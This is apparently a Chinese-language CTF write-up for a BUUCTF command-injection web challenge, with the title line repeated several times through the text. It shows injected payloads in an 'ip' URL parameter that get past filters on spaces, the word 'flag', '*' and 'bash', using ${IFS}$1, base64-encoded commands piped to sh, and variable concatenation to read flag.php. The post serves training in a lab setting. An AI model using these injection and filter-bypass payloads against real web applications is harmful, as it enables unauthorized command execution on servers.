buuctf之命令执行web骚操作......持续更新

空格过滤常见ctfweb题目中

buuctf之命令执行web骚操作......持续更新
大佬的博客,持续学习学习学习
https://www.ghtwf01.cn/index.php/archives/273/

通过学习知道怎么样绕过
以buuctfbuuctf之命令执行web骚操作......持续更新

首先使用burp抓包看看过滤了什么字符
基本上大部分字符都被过滤了,就很烦人
尝试构造?ip=127.0.0.1;ls
发现有两个东西
buuctf之命令执行web骚操作......持续更新
构造cat falg.php发现被过滤了,这怎么办???
flag被过滤,空格也被过滤
尝试%09发现不行
尝试nl%09*
发现被过滤了*
也就是说想要一键出flag不可能
上网查查过滤怎么办发现可以构造
${IFS}$1
尝试构造

?ip=127.0.0.1;nl${IFS}$1index.php
buuctf之命令执行web骚操作......持续更新看到bash被过滤了
卧槽
但是sh没有被过滤,flag也没了
想想可以
?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
base64解码
用sh在bash下大部分都能运行
或者
变量拼接↓

我们看到源码中有一个$a变量可以覆盖

?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php

buuctf之命令执行web骚操作......持续更新

欢迎大佬的各种骚操作